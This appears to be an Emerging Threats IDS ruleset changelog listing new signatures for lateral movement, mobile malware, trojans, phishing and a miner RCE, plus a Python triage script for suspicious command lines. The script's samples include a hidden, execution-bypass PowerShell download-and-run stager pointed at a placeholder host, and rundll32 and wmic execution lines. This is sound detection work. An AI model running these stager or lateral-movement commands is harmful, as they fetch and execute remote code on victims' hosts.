[***] Summary: [***]
14 new Open, 58 new Pro (the 14 Open plus 44 Pro-only). PowerShell over SMB lateral movement, Parasite HTTP, Nanopool Claymore RCE, Simple Botnet, various phishing landings, mobile malware.
Thanks: Kevin Ross
[+++] Added rules: [+++]
Open:
2025719 - ET POLICY Powershell Activity Over SMB - Likely Lateral Movement (policy.rules)
2025720 - ET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement (policy.rules)
2025721 - ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement (policy.rules)
2025722 - ET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement (policy.rules)
2025723 - ET POLICY Powershell Command With Execution Bypass Argument Over SMB - Likely Lateral Movement (policy.rules)
2025724 - ET POLICY Powershell Command With NonInteractive Argument Over SMB - Likely Lateral Movement (policy.rules)
2025725 - ET POLICY RunDll Request Over SMB - Likely Lateral Movement (policy.rules)
2025726 - ET POLICY WMIC WMI Request Over SMB - Likely Lateral Movement (policy.rules)
2025727 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup (mobile_malware.rules)
2025728 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 2 (mobile_malware.rules)
2025729 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 3 (mobile_malware.rules)
2025730 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 4 (mobile_malware.rules)
2025731 - ET MOBILE_MALWARE iOS/Bahamut DNS Lookup 5 (mobile_malware.rules)
2025732 - ET WEB_SPECIFIC_APPS ELF file magic encoded ASCII Inbound Web Servers Likely Command Execution 4 (web_specific_apps.rules)
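The eight "Likely Lateral Movement" policy rules above key on the same handful of indicators: a PowerShell command line carried over SMB (for example as a service binPath or scheduled-task action pushed by a PsExec-style tool), the hidden-window, encoded-command, no-profile, execution-policy-bypass and non-interactive switches, and rundll32 or wmic invocations. The following is an added host-side triage example, not Emerging Threats rule content and not a reproduction of the signatures' matching logic: it classifies command-line strings already extracted from SMB writes by those argument classes. The short switch forms come from the documented `powershell.exe /?` aliases; the sample command lines, the 203.0.113.10 address and the file names are constructed for the example.

```python
"""Triage command lines recovered from SMB writes by the argument classes the
ET "Powershell ... Over SMB" policy rules name.  Added example, not ET rule
content.  Input is assumed to be the already-extracted command-line text, not
raw SMB frames.  All sample data below is constructed."""
import base64

# Documented short forms from `powershell.exe /?`.  PowerShell also accepts any
# unambiguous prefix of a parameter name, so each entry records the shortest
# unambiguous prefix length plus the irregular aliases (e.g. -ec, -ep).
SWITCHES = {
    "windowstyle":     (1, {"w", "win"}),
    "encodedcommand":  (1, {"e", "ec", "enc"}),
    "noprofile":       (3, {"nop"}),
    "executionpolicy": (2, {"ex", "ep"}),
    "noninteractive":  (4, {"noni"}),
}
TAKES_VALUE = {"windowstyle", "encodedcommand", "executionpolicy"}


def resolve_switch(token):
    """Map '-w', '/Enc', '-ExecutionPolicy' etc. to a canonical switch name."""
    name = token.lstrip("-/").lower()
    if not name:
        return None
    for canonical, (min_len, aliases) in SWITCHES.items():
        if name in aliases or (len(name) >= min_len and canonical.startswith(name)):
            return canonical
    return None


def decode_encoded_command(value):
    """-EncodedCommand carries base64 of UTF-16LE script text; None if malformed."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return {'tool': powershell|rundll32|wmic|None, 'flags': set, 'decoded': str|None}."""
    result = {"tool": None, "flags": set(), "decoded": None}
    tokens = cmdline.split()
    if not tokens:
        return result
    exe = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe in ("powershell", "pwsh"):
        result["tool"] = "powershell"
    elif exe in ("rundll32", "wmic"):
        result["tool"] = exe          # 2025725 / 2025726 fire on the tool alone
        return result
    else:
        return result

    i = 1
    while i < len(tokens):
        switch = resolve_switch(tokens[i]) if tokens[i][0] in "-/" else None
        value = tokens[i + 1] if i + 1 < len(tokens) else ""
        if switch == "windowstyle" and value.lower() == "hidden":
            result["flags"].add("hidden_window")
        elif switch == "encodedcommand" and value:
            result["flags"].add("encoded")
            result["decoded"] = decode_encoded_command(value)
        elif switch == "noprofile":
            result["flags"].add("no_profile")
        elif switch == "executionpolicy" and value.lower() == "bypass":
            result["flags"].add("exec_bypass")
        elif switch == "noninteractive":
            result["flags"].add("noninteractive")
        i += 2 if switch in TAKES_VALUE else 1   # skip a consumed value token
    return result


def triage(cmdlines):
    """Yield (index, tool, sorted flags, decoded) for every line worth an alert."""
    for idx, line in enumerate(cmdlines):
        r = classify(line)
        if r["tool"] is not None:
            yield idx, r["tool"], sorted(r["flags"]), r["decoded"]


# Constructed samples: a stager as a lateral-movement tool would push it, a
# rundll32 and a wmic invocation, and a benign cmd line that should not alert.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLES = [
    f"powershell.exe -nop -w hidden -noni -ep bypass -enc {ENCODED}",
    r"C:\Windows\System32\rundll32.exe C:\Windows\Temp\upd.dll,DllRegisterServer",
    'wmic process call create "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"',
    r"cmd.exe /c dir \\fileserver\share",
]

if __name__ == "__main__":
    for idx, tool, flags, decoded in triage(SAMPLES):
        print(f"[{idx}] {tool}: {flags}")
        if decoded:
            print("     decoded:", decoded)
```

The prefix table is the part worth keeping honest in a real detector: signatures that match only on the literal strings `-enc` or `-w hidden` miss `-e`, `-ec`, `-win Hidden` and every other prefix PowerShell accepts, which is exactly what operators abbreviate to. Decoding the `-EncodedCommand` payload is what turns a policy hit into something an analyst can act on.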
Pro:
2831815 - ETPRO MOBILE_MALWARE Android.Riskware.Downloader.GE Uploading Activity (mobile_malware.rules)
2831816 - ETPRO MOBILE_MALWARE Android Trojan-Spy Arid Viper Uploading Device Info (mobile_malware.rules)
2831817 - ETPRO CURRENT_EVENTS Likely Malicious JS Inbound (current_events.rules)
2831818 - ETPRO MOBILE_MALWARE Android Riskware Dudata Device Info Exfil (mobile_malware.rules)
2831819 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download (web_specific_apps.rules)
2831820 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download (web_specific_apps.rules)
2831821 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download (web_specific_apps.rules)
2831822 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Service Stop (web_specific_apps.rules)
2831823 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Process Kill (web_specific_apps.rules)
2831824 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Service start (web_specific_apps.rules)
2831825 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Service Enable (web_specific_apps.rules)
2831826 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Change Admin Passwd (web_specific_apps.rules)
2831827 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Add Admin Passwd (web_specific_apps.rules)
2831828 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Add Root Htpasswd (web_specific_apps.rules)
2831829 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Crontab (web_specific_apps.rules)
2831830 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Startup Script (web_specific_apps.rules)
2831831 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Disable Firewall (web_specific_apps.rules)
2831832 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Start the Microhard Sh (msshc) service (web_specific_apps.rules)
2831833 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Auto-enable the Microhard Sh (msshc) service (web_specific_apps.rules)
2831834 - ETPRO TROJAN Parasite HTTP Checkin (trojan.rules)
2831835 - ETPRO TROJAN W32/Chthonic CnC Domain (bookreader .bit in DNS Lookup) (trojan.rules)
2831836 - ETPRO TROJAN W32/Chthonic CnC Domain (doghunter .bit in DNS Lookup) (trojan.rules)
2831837 - ETPRO TROJAN Cerber Domain Observed (1cknbd .top in DNS Lookup) (trojan.rules)
2831838 - ETPRO TROJAN Cerber Domain Observed (1cknbd .top in TLS SNI) (trojan.rules)
2831839 - ETPRO CURRENT_EVENTS Observed Malicious SSL Cert (MalDoc DL 2018-07-17) (current_events.rules)
2831840 - ETPRO EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux (exploit.rules)
2831841 - ETPRO EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows (exploit.rules)
2831842 - ETPRO TROJAN Simple Botnet CnC Checkin (trojan.rules)
2831843 - ETPRO CURRENT_EVENTS Appleconnect Verification Code - Phishing Landing 2018-07-17 (current_events.rules)
2831844 - ETPRO CURRENT_EVENTS Successful ASB Bank Phish 2018-07-17 (current_events.rules)
2831845 - ETPRO CURRENT_EVENTS Successful Human Resources Phish 2018-07-17 (current_events.rules)
2831846 - ETPRO WEB_SPECIFIC_APPS Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials (web_specific_apps.rules)
2831847 - ETPRO TROJAN Kot1Key CnC Checkin (trojan.rules)
2831848 - ETPRO CURRENT_EVENTS Successful Apple Find my iPhone Phish 2018-07-17 (current_events.rules)
2831849 - ETPRO CURRENT_EVENTS Successful Wells Fargo Phish 2018-07-17 (current_events.rules)
2831850 - ETPRO TROJAN MSIL/Racoon3000 CnC Exil M2 (trojan.rules)
2831851 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 1) (trojan.rules)
2831852 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 2) (trojan.rules)
2831853 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 3) (trojan.rules)
2831854 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 4) (trojan.rules)
2831855 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 5) (trojan.rules)
2831856 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 6) (trojan.rules)
2831857 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 7) (trojan.rules)
2831858 - ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-17 8) (trojan.rules)
[///] Modified active rules: [///]
2011582 - ET POLICY Vulnerable Java Version 1.6.x Detected (policy.rules)
2014297 - ET POLICY Vulnerable Java Version 1.7.x Detected (policy.rules)
2017128 - ET TROJAN W32.Berbew Check-in (trojan.rules)
2019401 - ET POLICY Vulnerable Java Version 1.8.x Detected (policy.rules)
2025314 - ET POLICY Vulnerable Java Version 9.0.x Detected (policy.rules)
2025518 - ET POLICY Vulnerable Java Version 10.0.x Detected (policy.rules)